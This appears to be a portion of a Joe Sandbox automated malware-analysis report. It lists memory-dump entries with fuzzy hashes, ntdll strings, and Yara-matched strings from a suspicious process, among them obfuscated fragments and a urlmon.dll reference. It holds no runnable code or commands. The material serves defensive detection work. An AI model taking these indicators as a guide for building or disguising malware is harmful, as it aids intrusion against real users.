                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c7dfdfb699be91583cd63f341cd10ab2375b0b0b1c627bbc0b18fe066a8f9397
                                            • Instruction ID: f6021ed495f5f2aa8f8e08767c6e668882adaf536544cb56668249e49d0b7ef2
                                            • Opcode Fuzzy Hash: c7dfdfb699be91583cd63f341cd10ab2375b0b0b1c627bbc0b18fe066a8f9397
                                            • Instruction Fuzzy Hash: 2890023520251142A540725C9804A4E411597E1302B95D416E0415554CC91489615322
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9fb177f767657bdced3a9b87e2796e4cee044ce7c6cdfefb7503653e81529081
                                            • Instruction ID: ecfa70658b9b39eb20faddcd07cbe90cf9d34dc28c44ff2749ae8877a6ea2815
                                            • Opcode Fuzzy Hash: 9fb177f767657bdced3a9b87e2796e4cee044ce7c6cdfefb7503653e81529081
                                            • Instruction Fuzzy Hash: 2290022D21351002E180715C940860A001597D1202F95D416E0415558CC91589695322
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5d01a0bcd637a2dc50e8ee639109d36f5572077b515249a0639e3bd094ed314b
                                            • Instruction ID: 8628e9bab6a4280b3c2e93b823e84efe5b47ea11ff470ed144b555e552725cd5
                                            • Opcode Fuzzy Hash: 5d01a0bcd637a2dc50e8ee639109d36f5572077b515249a0639e3bd094ed314b
                                            • Instruction Fuzzy Hash: BE90022530151003E140715C94186064015E7E1301F55D012E0814554CD91589565323
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 83b1068bbcc9abf30d9637adb5450efb72862d27275f5e459d19765ff12751bc
                                            • Instruction ID: e7d6ee4cf95f8375d5b0b8343d4699337ff36a6468ed4792a5af16eb92146ff6
                                            • Opcode Fuzzy Hash: 83b1068bbcc9abf30d9637adb5450efb72862d27275f5e459d19765ff12751bc
                                            • Instruction Fuzzy Hash: E890023920151402E510715C9804646005697D0301F55D412E0824558DC65489A1A222
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 81f6fa64fc1aeb499a58aa96042376bb14137aa7520561fb0f2b9560bbd895ef
                                            • Instruction ID: 222808043593ebb094aed55aed3c12b5475ba93cf97c51aeb7b8e640e2095d30
                                            • Opcode Fuzzy Hash: 81f6fa64fc1aeb499a58aa96042376bb14137aa7520561fb0f2b9560bbd895ef
                                            • Instruction Fuzzy Hash: 5490023524151402E141715C84046060019A7D0241F95C013E0824554EC6558B56AB62
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 54e34584302c7f00bc29ac04c9bc70da1e61728808f5dff11917d5ea9b9c85b0
                                            • Instruction ID: d6ad78df4657e78a02ddfea4630f1a76ade5df248613fbe1764efe8a5ca789ff
                                            • Opcode Fuzzy Hash: 54e34584302c7f00bc29ac04c9bc70da1e61728808f5dff11917d5ea9b9c85b0
                                            • Instruction Fuzzy Hash: 31900225242551526545B15C84045074016A7E0241795C013E1814950CC5269956D722
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 27ae041ac1b2cd11cd6f617bf1f7fd6a7c0816322cd5ed3165afa2ab03cd911f
                                            • Instruction ID: 28de6fa8172aaebe58d266d7ae12fb865f6b674d50dddbd06ccadf8cb1d59fba
                                            • Opcode Fuzzy Hash: 27ae041ac1b2cd11cd6f617bf1f7fd6a7c0816322cd5ed3165afa2ab03cd911f
                                            • Instruction Fuzzy Hash: 0790023520151842E100715C8404B46001597E0301F55C017E0524654DC615C9517622
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7c7f71e62c3f8b425a33744cc8e4360529be7bbd83a7d6d984f7c3e72a54a4ee
                                            • Instruction ID: fed4dc03e18a5f70cfd9e0343e8a1d65693b43233959d44e72e06ef4d0de5170
                                            • Opcode Fuzzy Hash: 7c7f71e62c3f8b425a33744cc8e4360529be7bbd83a7d6d984f7c3e72a54a4ee
                                            • Instruction Fuzzy Hash: 3690023520151402E100759C9408646001597E0301F55D012E5424555EC66589916232
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7995900e9ddf451b9bbbf6e1d67717d1315cb18eb32cea10e1c46d1aee504304
                                            • Instruction ID: 28d2a9a8d34ba67b946ae3d78dbaeda62468b16f615ce5fd5bf5f0127c4643f8
                                            • Opcode Fuzzy Hash: 7995900e9ddf451b9bbbf6e1d67717d1315cb18eb32cea10e1c46d1aee504304
                                            • Instruction Fuzzy Hash: 8990022560551402E140715C9418706002597D0201F55D012E0424554DC6598B5567A2
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 545fa9c7dddc48d777627b1bdb076c48b0bedd12ea3e8d852e23285a62c1bd55
                                            • Instruction ID: 2c0da6c6c4ba95a3ff2d16b361e3a7cc1502462fcca474ee28911a75cc220433
                                            • Opcode Fuzzy Hash: 545fa9c7dddc48d777627b1bdb076c48b0bedd12ea3e8d852e23285a62c1bd55
                                            • Instruction Fuzzy Hash: 6C90023520151403E100715C9508707001597D0201F55D412E0824558DD65689516222
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 878c63d71714c6976006fa7300a84b616f2b115beaad59904ec687e6172f6120
                                            • Instruction ID: 10dc08da85576375132361fd9ff1884ef651609ae1adb715fbb76964588ed284
                                            • Opcode Fuzzy Hash: 878c63d71714c6976006fa7300a84b616f2b115beaad59904ec687e6172f6120
                                            • Instruction Fuzzy Hash: C790026534151442E100715C8414B060015D7E1301F55C016E1464554DC619CD526227
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                            • API String ID: 48624451-2108815105
                                            • Opcode ID: c2d34ac945a33e01b04a8ec8653d19b6171eefd892ccf13592b447371ddb1e36
                                            • Instruction ID: 08e0d7b6c9eb29df1883b52f33894d38ec03fe4c886f20b7996825ad07aedf8d
                                            • Opcode Fuzzy Hash: c2d34ac945a33e01b04a8ec8653d19b6171eefd892ccf13592b447371ddb1e36
                                            • Instruction Fuzzy Hash: BB51E5A5A00116BFDB51DB9C8C809BEFBF8BB08640B14816DF5D9D7A45D374DE048BA0
                                            Strings
                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 010F4725
                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 010F4787
                                            • Execute=1, xrefs: 010F4713
                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 010F4742
                                            • ExecuteOptions, xrefs: 010F46A0
                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 010F46FC
                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 010F4655
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                            • API String ID: 0-484625025
                                            • Opcode ID: 2287c66e2274d013f7339f044fffa0449b21f5c3e0fd30b0a94a3029fb6fd840
                                            • Instruction ID: 8580cd0a3ef20cc38327123b3428a9ad663941a9626619f2f98fe76e5db42c8c
                                            • Opcode Fuzzy Hash: 2287c66e2274d013f7339f044fffa0449b21f5c3e0fd30b0a94a3029fb6fd840
                                            • Instruction Fuzzy Hash: 60510A3164021A6AEB25AB68DCC6FEE77B8FF98704F0400EDD685AB1D1D7709A45CF50
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-$0$0
                                            • API String ID: 1302938615-699404926
                                            • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                            • Instruction ID: 565991f5a84cc811990774e0501e5789307d9e90659fd9da6ded81411b8385b5
                                            • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                            • Instruction Fuzzy Hash: 92818D70E052499EEF258F6CC8527EEBBE1AF45BA0F18429DD8D1A7291C7389841CF51
                                            Strings
                                            • RTL: Re-Waiting, xrefs: 010F7BAC
                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 010F7B7F
                                            • RTL: Resource at %p, xrefs: 010F7B8E
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 0-871070163
                                            • Opcode ID: caeff3ed2909aff43a3e8109ce504836a8e89d4bf38e672992f31188647ddbab
                                            • Instruction ID: ee38f48ee75ca746dff0801b9ca22ad25d9d87a5bcc66931b0bc15924dba093f
                                            • Opcode Fuzzy Hash: caeff3ed2909aff43a3e8109ce504836a8e89d4bf38e672992f31188647ddbab
                                            • Instruction Fuzzy Hash: B04103317047038FD725DE29C881BAAB7E5EF89710F000A5DEAD6DB680DB72E405CB92
                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 010F728C
                                            Strings
                                            • RTL: Re-Waiting, xrefs: 010F72C1
                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 010F7294
                                            • RTL: Resource at %p, xrefs: 010F72A3
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 885266447-605551621
                                            • Opcode ID: 225126f494d391e02521fdfbff1176ce8bfee734009b8b854aa6451e67513aab
                                            • Instruction ID: 6b34566efaf609cbc033f023429df6feb55d21bcc59cf065ac6474823284b63f
                                            • Opcode Fuzzy Hash: 225126f494d391e02521fdfbff1176ce8bfee734009b8b854aa6451e67513aab
                                            • Instruction Fuzzy Hash: 6841F035600203ABD765DE29CC82FAAB7E5FB54710F10461DFAD5AB680DB21E8028BD2
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-
                                            • API String ID: 1302938615-2137968064
                                            • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                            • Instruction ID: 9eac759cf03cbab8174b35a091a4dda483e5895753ba152793a1bf840550f1b3
                                            • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                            • Instruction Fuzzy Hash: 62919071E0021A9BEB64DF6DC8816BEBBF5BF44B20F24855EE995E72C0D73099428F11
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.2069978810.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_1050000_Scan 00093847.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $$@
                                            • API String ID: 0-1194432280
                                            • Opcode ID: 102bd670b72ce75debb7bb90ec0b55459026eadf33aefb69c74784d0b5d9779e
                                            • Instruction ID: 081af244bdf6d8a74a0b9bab43b3cf8218a517e85957d7b716512119dbf3156f
                                            • Opcode Fuzzy Hash: 102bd670b72ce75debb7bb90ec0b55459026eadf33aefb69c74784d0b5d9779e
                                            • Instruction Fuzzy Hash: CA812A72D042699FDB35DB54CC44BEEBBB8AB48754F0041EAEA59B7240D7309E84CFA0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: 6$O$S$\$s
                                            • API String ID: 0-3854637164
                                            • Opcode ID: 7c3170e3d236d613c40dfe4163ebf5b7933fc002c5a813f6abe6224a13d6b32c
                                            • Instruction ID: 38e62b252419e49ebc3edbad14a728b79755f78edef665cd16fe8b5777896bce
                                            • Opcode Fuzzy Hash: 7c3170e3d236d613c40dfe4163ebf5b7933fc002c5a813f6abe6224a13d6b32c
                                            • Instruction Fuzzy Hash: FF519272D01218ABDB10DF94DC49EEEB3B8EF84715F10919AED0CA7140E7757A448BE1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: "5$"5$no
                                            • API String ID: 0-979101545
                                            • Opcode ID: ffe0835a6af6a440bbf1c12640cc4d4b6a1c0cc43d94c78e9aae10dd2ab829ac
                                            • Instruction ID: 368c65d180e1e77d38abfaa3b39f777e5f17c3f6e471ab6965aeb8d66a644335
                                            • Opcode Fuzzy Hash: ffe0835a6af6a440bbf1c12640cc4d4b6a1c0cc43d94c78e9aae10dd2ab829ac
                                            • Instruction Fuzzy Hash: 001112B6D01219AF9B00DFE9D8409EEB7F9EF48210F04526AE909E7200E7706A10CBA1
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 98551f4a137f150eab55bb0b6b9ced247baf0530dc0ceb4816c04c7ab55fd6b9
                                            • Instruction ID: 497c4266c2a13f990618d8e25d0deabf573eedcc2ce5f5befdbad8cc5ab4d93f
                                            • Opcode Fuzzy Hash: 98551f4a137f150eab55bb0b6b9ced247baf0530dc0ceb4816c04c7ab55fd6b9
                                            • Instruction Fuzzy Hash: 6001EDB2D11219AFDB44DFE8D9449EEBBF8AF48200F14556EE915F3200E7745604CFA5
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 0efb73d00c5cedee516fbeedf5ff3956daa76e714c72226bd5090f97a6c8b798
                                            • Instruction ID: 4ba346011db71ef57ba6a8dd79a32555bc42dfbcfd8e3bb01ed521f6a58c3bef
                                            • Opcode Fuzzy Hash: 0efb73d00c5cedee516fbeedf5ff3956daa76e714c72226bd5090f97a6c8b798
                                            • Instruction Fuzzy Hash: 8CF0E9736102166BE7145A5DAC41B96B7CCEB85334F101222FE6C87251E672F41142E1
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8f403d3f732329e33212baf28b06a77484937563fe02a426d0199a584785f2ae
                                            • Instruction ID: f9e5dcf13def87199209458c1e5feba8a070bae2008085d7e022a40ed52871d2
                                            • Opcode Fuzzy Hash: 8f403d3f732329e33212baf28b06a77484937563fe02a426d0199a584785f2ae
                                            • Instruction Fuzzy Hash: 20F0BB719052087AEF20EF94DC46EEEB378DF94614F1052C9ED0C67141F5707E818B91
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b05b7834cd63d952803775c37644060b1baa7ab674ac8cf6716133b906a6f5d9
                                            • Instruction ID: f5fe9e0c9d88c33002af7e9fe883d4485dfcd98194ea0bca85d6a504b2b54472
                                            • Opcode Fuzzy Hash: b05b7834cd63d952803775c37644060b1baa7ab674ac8cf6716133b906a6f5d9
                                            • Instruction Fuzzy Hash: CEF01CB6240209BBE710EF99DC41EEB77ACEFC9610F004419BA29A7241DA74B951CBF1
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7fed1a80514c6fa1db7863ae72c74f853bda333c2cdb1dfbf31e523ce395b631
                                            • Instruction ID: 34779b0da69e608068fd371758ac22430f3c0b13aa918818bad71eb6b2f223ec
                                            • Opcode Fuzzy Hash: 7fed1a80514c6fa1db7863ae72c74f853bda333c2cdb1dfbf31e523ce395b631
                                            • Instruction Fuzzy Hash: 31F08271D05208EBDB14DFA4D841BDDBBB8EB04320F10876DE8359B2C0E634AB508785
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f603a91aafff13fe73b5f4fbf87c402e93bd50f142d50c53e52984b161c26a19
                                            • Instruction ID: 3c8432510175bbc30ac9d2a3eaa74fd6c3032b067ab6fda4c64af553ae15b139
                                            • Opcode Fuzzy Hash: f603a91aafff13fe73b5f4fbf87c402e93bd50f142d50c53e52984b161c26a19
                                            • Instruction Fuzzy Hash: 8EE06DB12403047BE614EE59DC40EEB37ACDFC5710F005008FA18A7241D670B9148AB5
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 54e92ae290354494b04a3b3a03cb6bd38f0468332122423aedbcc7a77d748e50
                                            • Instruction ID: 6dde063d9549c8c79c27aedb997821061669b6d81f900cbc90e084e3d23bc4ca
                                            • Opcode Fuzzy Hash: 54e92ae290354494b04a3b3a03cb6bd38f0468332122423aedbcc7a77d748e50
                                            • Instruction Fuzzy Hash: 24E0863661121437D6205989AC06FD777ECCFD2E60F0951B9FE18AB344E564BA018AE5
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 687496cac65c26d5c5f19ce16bc8b3374cab13f544166feabb51df8b3e0d61ef
                                            • Instruction ID: 6355513b4c43be9b85c87049f62ba57108524738f953d7a9c3eb10bcad27cdbf
                                            • Opcode Fuzzy Hash: 687496cac65c26d5c5f19ce16bc8b3374cab13f544166feabb51df8b3e0d61ef
                                            • Instruction Fuzzy Hash: 51E09B71D15108ABDB04DF64D841BEDBBB5DB45351F14836EEC29CB2C0D6359B508744
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 818853954403b0610952d6fd8e92de2fb837736f4d0c203e1f11f03a27760536
                                            • Instruction ID: aa427757392083a5a73de0da272b5d0b6ee25aa87286e6d053afcd6ec6b96c9a
                                            • Opcode Fuzzy Hash: 818853954403b0610952d6fd8e92de2fb837736f4d0c203e1f11f03a27760536
                                            • Instruction Fuzzy Hash: A7E046766502047BE220BA6ADC00EDB77ACEFC5614F405019FA28A7280CA76BA1187B0
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 46d1add3263de4254f303840ea8e7d5b92ea6b7c1465e8b7372c4be4e2b58ff3
                                            • Instruction ID: ae8279bc36ba110ac5ebbb334cbba2c576dff2cef646d8093a52f520f1ef2009
                                            • Opcode Fuzzy Hash: 46d1add3263de4254f303840ea8e7d5b92ea6b7c1465e8b7372c4be4e2b58ff3
                                            • Instruction Fuzzy Hash: 99D0C9F73141064AF7102A6DBC407957B8CEB80339F2067B3EA68CA2D1E767A0654260
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7d1194a5b160b843f4dc29294d398a3592559424996447af51ec5d19327997f3
                                            • Instruction ID: 53a6964429031782c036160521d0fd2e556de25aef3eb18163be3026a0afa47b
                                            • Opcode Fuzzy Hash: 7d1194a5b160b843f4dc29294d398a3592559424996447af51ec5d19327997f3
                                            • Instruction Fuzzy Hash: 32D0223399416249C71D1A7C6808054B7C0B70233932433F2CAFC862A0E21310219342
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b62095ae78c649296dec5747f3a1e33818fa69e41e32831bde38f2c8da0cec30
                                            • Instruction ID: 2f25d59d9fd52bc3e1424c5f9a8f63ea98f40726f45abee3960de5cd9be80c03
                                            • Opcode Fuzzy Hash: b62095ae78c649296dec5747f3a1e33818fa69e41e32831bde38f2c8da0cec30
                                            • Instruction Fuzzy Hash: 54C02BE534C6A4141902303C42C082C2DD34C824193E21B6590D19C04AFBD2438FC0C2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, Offset: 03FF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_8_2_3ff0000_uspEUeZyrqFDmi.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                            • API String ID: 0-3248090998
                                            • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                            • API String ID: 0-1002149817
                                            • String ID: .$9~b{$<9<-$bsnb$b{z=$g+&8$g+&8$g+&8.$n{z-$n{z:$qs9a$stf:$wffz$wqs9$x9n~$z:wf
                                            • API String ID: 0-2737636083
                                            • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
